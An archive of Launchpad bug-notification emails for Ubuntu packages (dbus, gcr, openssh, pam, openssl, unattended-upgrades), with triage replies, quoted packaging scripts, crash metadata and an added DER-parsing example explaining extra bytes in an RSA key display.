  InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no username)
   XDG_RUNTIME_DIR=
   LANG=fr_FR.UTF-8
   SHELL=/bin/bash
  SourcePackage: policykit-1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1969593/+subscriptions




[Touch-packages] [Bug 1969593] Re: rules to prevent non-root users from rebooting not taken into account

2022-04-20 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to policykit-1 in Ubuntu.
https://bugs.launchpad.net/bugs/1969593

Title:
  rules to prevent non-root users from rebooting not taken into account

Status in policykit-1 package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1969593/+subscriptions




[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot

2022-04-19 Thread Seth Arnold
This may be a duplicate of https://launchpad.net/bugs/1969162

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1968845

Title:
  Upgrade to 22.04 from 20.04 ends with dbus installation asking for a
  reboot

Status in dbus package in Ubuntu:
  New

Bug description:
  Upgrading on a virtual machine from 20.04 to 22.04. I have had this
  happen twice now, I got one upgrade done without this bug.

  Basically the package installation stops at dbus package asking for a
  reboot as it was unable to upgrade as dbus-daemon was running. And
  rebooting at this stage obviously will cause a non-functioning system.

  Added a screenshot of the upgrade window.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions




[Touch-packages] [Bug 1969118] Re: Certificate viewer shows extra bytes for RSA keys

2022-04-19 Thread Seth Arnold
Hello Mikko, thanks for the report; I believe that's working as
intended, those bytes are part of the DER encoding; there's an excellent
answer at https://crypto.stackexchange.com/a/19982/1400 that describes
the meanings of each of those bytes.

Thanks

** Information type changed from Private Security to Public Security

** Changed in: gcr (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to gcr in Ubuntu.
https://bugs.launchpad.net/bugs/1969118

Title:
  Certificate viewer shows extra bytes for RSA keys

Status in gcr package in Ubuntu:
  Invalid

Bug description:
  When I view an x509 certificate using

  gcr-viewer .../path/to/certificate.pem

  and open the "Details" section and check the RSA public key
  information, the section that lists the public key renders extra 8
  bytes at the start and 5 bytes at the end which are not actually part
  of the key.

  I haven't tried if this happens with other file types except x509, or
  with encryption methods except RSA. The exact certificate I viewed can
  be downloaded from https://crt.sh/?d=6454583403 and the expected
  public key modulus should start with 00:b6:28:0b:44:... but the
  certificate viewer shows public key starting with bytes 30 82 01 0A 02
  82 01 01 00 B6 28 0B 44. Note the extra bytes 30 82 01 0A 02 82 01 01.
  The extra bytes seem to be static and do not change after re-launching
  the viewer again. There are also extra bytes in the end of the
  displayed key.

  I'm marking this bug as a security vulnerability for now because

  (1) This tool is supposed to be used to check encryption credentials, and
  (2) It's still unknown if this is some kind of 8 byte underflow/5 byte
  overflow or just a rendering problem. I'm not aware of the viewer writing
  extra bytes to any memory location so I would assume this is just a
  rendering issue.

  I'm fine with this issue being public so feel free to publish at your
  discretion.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: gcr 3.28.0-1
  ProcVersionSignature: Ubuntu 5.4.0-107.121~18.04.1-lowlatency 5.4.174
  Uname: Linux 5.4.0-107-lowlatency x86_64
  ApportVersion: 2.20.9-0ubuntu7.27
  Architecture: amd64
  CurrentDesktop: MATE
  Date: Thu Apr 14 15:47:18 2022
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2019-01-05 (1194 days ago)
  InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725)
  SourcePackage: gcr
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gcr/+bug/1969118/+subscriptions
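
The byte layout discussed in this message, as an added example (not part of the original thread and not gcr's code): a minimal DER walker run over a constructed RSAPublicKey, showing where 8 leading and 5 trailing bytes come from. Only the modulus prefix 00 b6 28 0b 44 is taken from the report; the rest of the modulus and the exponent 65537 are assumptions.

```python
# Added example: minimal DER walker for RSAPublicKey.
# SAMPLE_DER is constructed; only the modulus prefix 00 b6 28 0b 44 is from the report.


def encode_tlv(tag, value):
    """Encode one DER tag-length-value (used only to build the sample)."""
    n = len(value)
    if n < 0x80:
        length = bytes([n])                      # short form: one length byte
    else:
        raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(raw)]) + raw  # long form, e.g. 82 01 01 for 257
    return bytes([tag]) + length + value


def read_tlv(buf, pos):
    """Parse one TLV at pos; return (tag, header_len, value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, hdr = first, 2
    else:
        n = first & 0x7F                         # number of length bytes that follow
        if n == 0 or n > 4 or pos + 2 + n > len(buf):
            raise ValueError("unsupported or truncated length field")
        length = int.from_bytes(buf[pos + 2:pos + 2 + n], "big")
        hdr = 2 + n
    end = pos + hdr + length
    if end > len(buf):
        raise ValueError("declared length runs past the end of the buffer")
    return tag, hdr, buf[pos + hdr:end], end


def parse_rsa_public_key(der):
    """Split RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    tag, seq_hdr, body, end = read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("expected exactly one SEQUENCE")
    tag, mod_hdr, mod_val, exp_pos = read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("modulus is not an INTEGER")
    tag, _, exp_val, body_end = read_tlv(body, exp_pos)
    if tag != 0x02 or body_end != len(body):
        raise ValueError("expected exactly two INTEGERs")
    return {
        # SEQUENCE header plus the modulus INTEGER header
        "leading": der[:seq_hdr + mod_hdr],
        # INTEGER contents; the leading 00 keeps the signed value positive
        # because the top bit of b6 is set
        "modulus_bytes": mod_val,
        "modulus": int.from_bytes(mod_val, "big"),
        # the whole publicExponent INTEGER (tag, length, value)
        "trailing": body[exp_pos:],
        "exponent": int.from_bytes(exp_val, "big"),
    }


# Constructed 2048-bit modulus: report's first five bytes, then filler bytes.
_MODULUS = bytes.fromhex("00b6280b44") + bytes(range(252))
_EXPONENT = (65537).to_bytes(3, "big")           # assumed exponent
SAMPLE_DER = encode_tlv(0x30, encode_tlv(0x02, _MODULUS) + encode_tlv(0x02, _EXPONENT))

if __name__ == "__main__":
    key = parse_rsa_public_key(SAMPLE_DER)
    print("leading :", key["leading"].hex(" "))
    print("modulus :", key["modulus_bytes"][:5].hex(":"), "...")
    print("trailing:", key["trailing"].hex(" "))
    print("bits    :", key["modulus"].bit_length(), "exponent:", key["exponent"])
```

The SEQUENCE length 01 0A (266) is the 4-byte INTEGER header, the 257 modulus bytes and the 5-byte exponent INTEGER added together.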




[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot

2022-04-19 Thread Seth Arnold
Here's the postinst I've got for that package. Maybe the
reload_dbus_config() could use a --reply-timeout=5000 or something?

Thanks

$ cat /fst/trees/ubuntu/main/d/dbus/dbus_1.12.20-2ubuntu4/debian/dbus.postinst 
#!/bin/sh
# Copyright © 2003 Colin Walters 
# Copyright © 2006 Sjoerd Simons 

set -e

MESSAGEUSER=messagebus
MESSAGEHOME=/var/run/dbus
LAUNCHER=/usr/lib/dbus-1.0/dbus-daemon-launch-helper

# This is what the init script would do, but it's simpler (and less
# dependent on sysvinit vs. Upstart vs. etc.) if we do it directly.
reload_dbus_config() {
    [ -S /var/run/dbus/system_bus_socket ] || return 0

    dbus-send --print-reply --system --type=method_call \
        --dest=org.freedesktop.DBus \
        / org.freedesktop.DBus.ReloadConfig > /dev/null || true
}

if [ "$1" = triggered ]; then
    reload_dbus_config
    exit 0
fi

if [ "$1" = configure ]; then
    adduser --system \
        --quiet \
        --home /nonexistent \
        --no-create-home \
        --disabled-password \
        --group "$MESSAGEUSER"

    if ! dpkg-statoverride --list "$LAUNCHER" >/dev/null; then
        dpkg-statoverride --update --add root "$MESSAGEUSER" 4754 "$LAUNCHER"
    fi

    # This is idempotent, so it's OK to do every time. The system bus' init
    # script does this anyway, but you also have to do this before a session
    # bus will work, so we do this here for the benefit of people starting
    # a temporary session bus in a chroot
    dbus-uuidgen --ensure
fi

if [ "$1" = configure ] && [ -n "$2" ]; then
    # On upgrades, we only reload config, and don't restart (restarting the
    # system bus is not supported by upstream). The code added by
    # dh_installinit -r creates a start action, below.

    # Recommend a reboot if there is a dbus-daemon running in the same root
    # as us. Deliberately not using anything init-related here, to be
    # init-agnostic: if we get a false positive (at least one dbus-daemon
    # is running but it isn't the system bus) that isn't the end of the
    # world, because it's probably a session bus, so the user needs to
    # log out and back in anyway.
    #
    # Debian has /usr/bin/dbus-daemon, Ubuntu has /bin/dbus-daemon.
    # Look for both.
    if pidof -c /bin/dbus-daemon /usr/bin/dbus-daemon >/dev/null; then
        echo "A reboot is required to replace the running dbus-daemon." >&2
        echo "Please reboot the system when convenient." >&2

        # trigger an update notification that recommends a reboot
        # (used by unattended-upgrades etc.)
        touch /var/run/reboot-required || true

        if ! grep -Fqsx dbus /run/reboot-required.pkgs; then
            echo dbus >> /run/reboot-required.pkgs || true
        fi

        # same thing for the older update-notifier interface
        [ -x /usr/share/update-notifier/notify-reboot-required ] && \
            /usr/share/update-notifier/notify-reboot-required || true
    fi

    # Clean up old compatibility symlinks that were used to upgrade from
    # Debian 8 to Debian 9. This can be dropped after Debian 10 is released.
    for bus in system session; do
        conf="/etc/dbus-1/${bus}.conf"
        exp_target="/usr/share/dbus-1/${bus}.conf"
        target="$(readlink -f "${conf}")" || continue

        if [ -h "${conf}" ] && [ "_${target}" = "_${exp_target}" ]; then
            rm -f "${conf}"
        fi
    done
fi

#DEBHELPER#

# Do this after the debhelper-generated bits so that dpkg-maintscript-helper
# will have finished moving configuration files around. We only need to do
# this for upgrades, not new installations.
if [ "$1" = configure ] && [ -n "$2" ]; then
    reload_dbus_config
fi

# We don't start dbus.service in postinst, so ensure dbus.socket is running
if [ "$1" = configure ] && [ -d /run/systemd/system ]; then
    systemctl try-restart sockets.target || true
fi

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1968845

Title:
  Upgrade to 22.04 from 20.04 ends with dbus installation asking for a
  reboot

Status in dbus package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions




[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot

2022-04-19 Thread Seth Arnold
Yikes, does it actually *stop* at that point? That's .. not ideal.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1968845

Title:
  Upgrade to 22.04 from 20.04 ends with dbus installation asking for a
  reboot

Status in dbus package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions




[Touch-packages] [Bug 1968305] Re: sshd_config.d overrides not working

2022-04-08 Thread Seth Arnold
This reminds me of several previous bugs; this may or may not be a
duplicate, and this may or may not be intentional behaviour. Hopefully
these are useful and save some debugging effort:

https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1922212
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1876320
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1873528

Especially 1873528 feels most likely to be relevant; I suggest
reading that one first.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1968305

Title:
  sshd_config.d overrides not working

Status in openssh package in Ubuntu:
  New

Bug description:
  Creating an sshd_config override file under /etc/ssh/sshd_config.d/
  does not override settings from /etc/ssh/sshd_config

  From debugging sshd, I can see the override file is indeed being read,
  and the option is supposedly set. But after testing, the options are
  not taking effect.

  Specifically, in the main sshd_config, I have disabled PasswordAuthentication
  In my override file, PasswordAuthentication is enabled

  Yet, when connecting to the server, it only checks public/private
  keys.


  This is for an environment where we have our default sshd_config, and in
  specific use-cases, we might enable PasswordAuthentication for some servers.

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: openssh-server 1:8.2p1-4ubuntu0.4
  ProcVersionSignature: Ubuntu 5.13.0-39.44~20.04.1-generic 5.13.19
  Uname: Linux 5.13.0-39-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.21
  Architecture: amd64
  CasperMD5CheckResult: pass
  Date: Fri Apr  8 10:37:42 2022
  InstallationDate: Installed on 2021-11-04 (154 days ago)
  InstallationMedia: Ubuntu-Server 20.04.3 LTS "Focal Fossa" - Release amd64 (20210824)
  SourcePackage: openssh
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1968305/+subscriptions




[Touch-packages] [Bug 1968047] Re: Ubuntu 22.04 Beta - Unable to compile ruby version 2.7.5, 3.0.3 and 3.3.3 problem with the openssl-dev package

2022-04-06 Thread Seth Arnold
Hopefully this is helpful for you:

https://sources.debian.org/data/main/r/ruby3.0/3.0.3-1/debian/patches/Update-openssl-to-version-3.0.0.patch

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1968047

Title:
  Ubuntu 22.04 Beta - Unable to compile ruby version 2.7.5, 3.0.3 and
  3.3.3  problem with the openssl-dev package

Status in openssl package in Ubuntu:
  New

Bug description:
  This problem only exists in Ubuntu 22.04 beta
  When attempting to compile ruby (any version - I have tried 2.7.5, 3.0.3 &
  3.1.1) it fails because of a problem with the libssl-dev package.  The
  previous version of Ubuntu used version 1.1.1.  The new version uses
  openssl-dev/libssl-dev 3.0.2

  $ lsb_release -rd
  Description:    Ubuntu Jammy Jellyfish (development branch)
  Release:        22.04

  sudo apt-cache policy libssl-dev
  libssl-dev:
    Installed: 3.0.2-0ubuntu1
    Candidate: 3.0.2-0ubuntu1
    Version table:
   *** 3.0.2-0ubuntu1 500
          500 http://au.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1968047/+subscriptions




[Touch-packages] [Bug 1965661] Re: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'

2022-03-22 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1965661

Title:
  software-properties-gtk crashed with AttributeError in
  packages_for_modalias(): 'Cache' object has no attribute 'packages'

Status in software-properties package in Ubuntu:
  New

Bug description:
  software-properties-gtk crashed with AttributeError in
  packages_for_modalias(): 'Cache' object has no attribute 'packages'

  ProblemType: Crash
  DistroRelease: Ubuntu 22.04
  Package: software-properties-gtk 0.99.19
  ProcVersionSignature: Ubuntu 5.15.0-23.23-generic 5.15.27
  Uname: Linux 5.15.0-23-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu79
  Architecture: amd64
  CasperMD5CheckResult: pass
  CrashCounter: 1
  CurrentDesktop: ubuntu:GNOME
  Date: Sun Mar 20 03:33:53 2022
  ExecutablePath: /usr/bin/software-properties-gtk
  InstallationDate: Installed on 2022-03-20 (0 days ago)
  InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Alpha amd64 (20220319)
  InterpreterPath: /usr/bin/python3.10
  PackageArchitecture: all
  ProcCmdline: /usr/bin/python3 /usr/bin/software-properties-gtk --open-tab 2
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  Python3Details: /usr/bin/python3.10, Python 3.10.2+, python3-minimal, 3.10.1-0ubuntu2
  PythonArgs: ['/usr/bin/software-properties-gtk', '--open-tab', '2']
  PythonDetails: N/A
  SourcePackage: software-properties
  Title: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'
  UpgradeStatus: No upgrade log present (probably fresh install)
  UserGroups: adm cdrom dip lpadmin lxd plugdev sambashare sudo

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1965661/+subscriptions




[Touch-packages] [Bug 1965857] Re: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'

2022-03-22 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1965857

Title:
  software-properties-gtk crashed with AttributeError in
  packages_for_modalias(): 'Cache' object has no attribute 'packages'

Status in software-properties package in Ubuntu:
  New

Bug description:
  live patch not active

  ProblemType: Crash
  DistroRelease: Ubuntu 22.04
  Package: software-properties-gtk 0.99.19
  ProcVersionSignature: Ubuntu 5.15.0-23.23-generic 5.15.27
  Uname: Linux 5.15.0-23-generic x86_64
  ApportVersion: 2.20.11-0ubuntu79
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Mar 22 10:22:47 2022
  ExecutablePath: /usr/bin/software-properties-gtk
  InstallationDate: Installed on 2020-04-25 (695 days ago)
  InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423)
  InterpreterPath: /usr/bin/python3.10
  PackageArchitecture: all
  ProcCmdline: /usr/bin/python3 /usr/bin/software-properties-gtk --open-tab=6
  ProcEnviron:
   LANGUAGE=en_IN:en
   PATH=(custom, user)
   XDG_RUNTIME_DIR=
   LANG=en_IN
   SHELL=/bin/bash
  Python3Details: /usr/bin/python3.10, Python 3.10.3, python3-minimal, 3.10.1-0ubuntu2
  PythonArgs: ['/usr/bin/software-properties-gtk', '--open-tab=6']
  PythonDetails: N/A
  SourcePackage: software-properties
  Title: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'
  UpgradeStatus: Upgraded to jammy on 2022-02-12 (37 days ago)
  UserGroups: adm cdrom dip lpadmin lxd plugdev sambashare sudo

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1965857/+subscriptions




[Touch-packages] [Bug 1885990] Re: server: Match has no effect in include file (upstream 3122)

2022-03-16 Thread Seth Arnold
I can't speak for the SRU team, but it's entirely possible that if you
prepare and test a debdiff, and show that this can be fixed, you could
drive an SRU through to completion; see
https://wiki.ubuntu.com/StableReleaseUpdates for more information.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1885990

Title:
  server: Match has no effect in include file (upstream 3122)

Status in portable OpenSSH:
  Unknown
Status in openssh package in Ubuntu:
  Fix Released

Bug description:
  Hello

  Ubuntu version: focal 20.04 LTS
  Version:
  openssh-server:
    Installed: 1:8.2p1-4ubuntu0.1
    Candidate: 1:8.2p1-4ubuntu0.1
  Expected: match statement in included files work as documented in the fine
  manual
  What happens: the statements are ignored.

  If you add Match statements in an included file, it will generate no error
  but have no effect.
  The exact same statements work in the main server config file
  (/etc/ssh/sshd_config)

  this is to track upstream bug 3122:

  https://bugzilla.mindrot.org/show_bug.cgi?id=3122

  it's fixed but will only be in 8.4 so it affects Ubuntu 20.04 LTS
  where openssh is at 8.2.

  I'm not *absolutely* whining for a backport since include files is a
  new feature for openssl in focal so it's not a regression. Would be
  nice though :),  because include files are standard for any server
  software in Linux since at least a decade...

To manage notifications about this bug go to:
https://bugs.launchpad.net/openssh/+bug/1885990/+subscriptions




[Touch-packages] [Bug 1964642] Re: Packer virtualbox ssh can't connect to unattended Ubuntu 20.04.1/2/3/4 but can connect to Ubuntu 20.4

2022-03-14 Thread Seth Arnold
Yeah, it seems unlikely to be ssh to me -- can you ping the machine? Does
virtualbox networking do interfaces that can ping? Does virtualbox offer
a 'console view' that you can use to debug the system?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1964642

Title:
  Packer virtualbox ssh can't connect to unattended Ubuntu 20.04.1/2/3/4
  but can connect to Ubuntu 20.4

Status in openssh package in Ubuntu:
  New

Bug description:
  Two years ago I was able to create a Virtualbox Ubuntu 20.04 guest in a
  Windows 10 host with Packer 1.5.6, using an unattended installation.
  The Packer command was:
  "boot_command": [
    " ",
    "autoinstall ds=nocloud-net;s=http://{{ .HTTPIP }}:{{ .HTTPPort }}/",
    ""
  ],
  The user-data file was:
  #cloud-config
  autoinstall:
    version: 1
    identity:
      realname: mclibre
      hostname: ubuntu
      password: '$6$mclibre$YiuRPSZM3ZXVe4UyIqv1dvy9rUjf5/LsGCkDyaex.WN45wzVTuRmW5QLuctuicGAFZIO2M3QR8NLdtQYatKTn1'
      username: mclibre
    locale: es_ES.UTF-8
    keyboard:
      layout: es
    network:
      network:
        version: 2
        ethernets:
          ens33: {dhcp4: true, dhcp-identifier: mac}
    ssh:
      install-server: true
    late-commands:
      - sed -i 's/^#*\(send dhcp-client-identifier\).*$/\1 = hardware;/' /target/etc/dhcp/dhclient.conf
      - 'sed -i "s/dhcp4: true/&\n  dhcp-identifier: mac/" /target/etc/netplan/00-installer-config.yaml'
  Now, I have tried to create a Virtualbox Ubuntu 20.04.4/.3/.2/.1 guest using
  packer 1.5.6 but Packer can't create the image because once the installation
  is done, after rebooting the SSH server does not answer (the packer log error
  says: SSH handshake err: Timeout during SSH handshake).
  I have tried with the last version of Packer, Packer 1.8.0, and the result is
  the same. I can create a Ubuntu Server 20.4 image but not a Ubuntu Server
  20.4.1, .2, .3 or .4 image.
  I can provide as much additional information as you want.
  Thanking you in advance,
  Bartolome Sintes

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1964642/+subscriptions




[Touch-packages] [Bug 1964561] Re: package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade: installed libpam-runtime package post-installation script subprocess returned error exit status 25

2022-03-11 Thread Seth Arnold
Corruption was my first idea, too, but the Dependencies.txt didn't
report debsums mismatches. Thanks for the explanations.

** Also affects: debconf (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1964561

Title:
  package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade:
  installed libpam-runtime package post-installation script subprocess
  returned error exit status 255

Status in debconf package in Ubuntu:
  New
Status in pam package in Ubuntu:
  New

Bug description:
  I found this bug when I upgrade my ubuntu 20.04 LTS using command
  "apt-get upgrade"

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: libpam-runtime 1.3.1-5ubuntu4.3
  ProcVersionSignature: Ubuntu 5.13.0-35.40~20.04.1-generic 5.13.19
  Uname: Linux 5.13.0-35-generic x86_64
  NonfreeKernelModules: crc32_pclmul
  ApportVersion: 2.20.11-0ubuntu27.16
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Fri Mar 11 10:43:38 2022
  ErrorMessage: installed libpam-runtime package post-installation script subprocess returned error exit status 255
  InstallationDate: Installed on 2022-03-10 (0 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.8, Python 3.8.5, unpackaged
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: pam
  Title: package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade: installed libpam-runtime package post-installation script subprocess returned error exit status 255
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/debconf/+bug/1964561/+subscriptions




[Touch-packages] [Bug 1964561] Re: package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade: installed libpam-runtime package post-installation script subprocess returned error exit status 25

2022-03-11 Thread Seth Arnold
These lines from the logs look most relevant:

Unpacking libpam-runtime (1.3.1-5ubuntu4.3) over (1.3.1-5ubuntu4.1) ...
Setting up libpam-runtime (1.3.1-5ubuntu4.3) ...
Can't locate object method "new" via package "Debconf::Element::Noninteractive::Multiselect" (perhaps you forgot to load "Debconf::Element::Noninteractive::Multiselect"?) at /usr/share/perl5/Debconf/FrontEnd.pm line 68,  line 8.
Use of uninitialized value $ret in scalar chomp at /usr/share/perl5/Debconf/Client/ConfModule.pm line 132,  line 7.
Use of uninitialized value $ret in split at /usr/share/perl5/Debconf/Client/ConfModule.pm line 133,  line 7.
Use of uninitialized value $ret[0] in string eq at /usr/share/perl5/Debconf/Client/ConfModule.pm line 134,  line 7.
dpkg: error processing package libpam-runtime (--configure):
 installed libpam-runtime package post-installation script subprocess returned error exit status 255

Is pam missing a versioned pre-depends? or is something not prepared to
handle a non-interactive update?

Amit you can probably make progress by running this in a terminal:
sudo apt install -f

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1964561

Title:
  package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade:
  installed libpam-runtime package post-installation script subprocess
  returned error exit status 255

Status in pam package in Ubuntu:
  New

Bug description:
  I found this bug when I upgrade my ubuntu 20.04 LTS using command
  "apt-get upgrade"

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: libpam-runtime 1.3.1-5ubuntu4.3
  ProcVersionSignature: Ubuntu 5.13.0-35.40~20.04.1-generic 5.13.19
  Uname: Linux 5.13.0-35-generic x86_64
  NonfreeKernelModules: crc32_pclmul
  ApportVersion: 2.20.11-0ubuntu27.16
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Fri Mar 11 10:43:38 2022
  ErrorMessage: installed libpam-runtime package post-installation script subprocess returned error exit status 255
  InstallationDate: Installed on 2022-03-10 (0 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.8, Python 3.8.5, unpackaged
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: pam
  Title: package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade: installed libpam-runtime package post-installation script subprocess returned error exit status 255
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/1964561/+subscriptions




[Touch-packages] [Bug 1963751] Re: focal security update 2.34.6-0ubuntu0.20.04.1 cannot be automatically installed due to new dependency

2022-03-07 Thread Seth Arnold
Thanks for doing the digging to confirm the cause; I suspect
unattended-upgrades should be modified to perform something similar to
apt upgrade, rather than apt-get upgrade, and bring in new dependencies
when necessary. A lot of systems never have interactive users any more.

Thanks

** Changed in: unattended-upgrades (Ubuntu)
   Status: Incomplete => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unattended-upgrades in
Ubuntu.
https://bugs.launchpad.net/bugs/1963751

Title:
  focal security update 2.34.6-0ubuntu0.20.04.1 cannot be automatically
  installed due to new dependency

Status in unattended-upgrades package in Ubuntu:
  Confirmed

Bug description:
  Version: 2.34.6-0ubuntu0.20.04.1

  This security update for focal does not seem to be automatically
  upgradeable by unattended-upgrades:

  2022-03-05 14:32:35,653 WARNING package libwebkit2gtk-4.0-37 upgradable but fails to be marked for upgrade (E:Unable to correct problems, you have held broken packages.)
  2022-03-05 14:32:36,685 WARNING package libwebkit2gtk-4.0-37 upgradable but fails to be marked for upgrade (E:Unable to correct problems, you have held broken packages.)
  2022-03-05 14:32:38,031 INFO No packages found that can be upgraded unattended and no pending auto-removals
  2022-03-05 14:32:38,232 INFO Package libjavascriptcoregtk-4.0-18 is kept back because a related package is kept back or due to local apt_preferences(5).
  2022-03-05 14:32:38,382 INFO Package libwebkit2gtk-4.0-37 is kept back because a related package is kept back or due to local apt_preferences(5).

  apt-mark showhold lists no held packages, and there are no
  apt_preferences set. The actual cause seems to be an extra dependency
  on libopengl0 which has been added with the upgrade. Is this
  intentional?

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: libwebkit2gtk-4.0-37 2.34.6-0ubuntu0.20.04.1
  ProcVersionSignature: Ubuntu 5.4.0-100.113-generic 5.4.166
  Uname: Linux 5.4.0-100-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.21
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Sat Mar  5 14:39:24 2022
  InstallationDate: Installed on 2018-06-15 (1358 days ago)
  InstallationMedia: Xubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  ProcEnviron:
   TERM=screen.xterm-256color
   PATH=(custom, no user)
   LANG=en_GB.UTF-8
   SHELL=/bin/bash
  SourcePackage: webkit2gtk
  UpgradeStatus: Upgraded to focal on 2021-05-30 (278 days ago)

To manage notifications about this bug go to:
